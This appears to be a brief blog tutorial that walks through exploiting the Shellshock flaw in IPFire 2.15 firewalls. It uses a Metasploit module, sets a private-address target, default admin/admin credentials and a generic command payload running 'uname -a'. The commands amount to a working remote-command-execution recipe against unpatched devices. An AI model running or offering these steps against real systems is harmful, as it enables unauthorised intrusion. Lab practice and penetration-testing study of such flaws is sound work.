Exploit Linux PC using IPFire Bash Environment Variable Injection (Shellshock)

IPFire, a free linux based open source firewall distribution, version <= 2.15 Update Core 82 contains an authenticated remote command execution vulnerability via shellshock in the request header

 Exploit Targets

Ip Fire 2.15

Requirement

Attacker: kali Linux

Victim PC: Linux

Open Kali terminal type msfconsole

Now type use exploit/linux/http/ipfire_bashbug_exec

msf exploit (ipfire_bashbug_exec)>set rhost 192.168.0.176

msf exploit (ipfire_bashbug_exec)>set username admin

msf exploit (ipfire_bashbug_exec)>set password admin

msf exploit (ipfire_bashbug_exec)>set payload cmd/unix/generic

msf exploit (ipfire_bashbug_exec)>set cmd uname -a

msf exploit (ipfire_bashbug_exec)>exploit          

Leave a Reply

Your email address will not be published. Required fields are marked *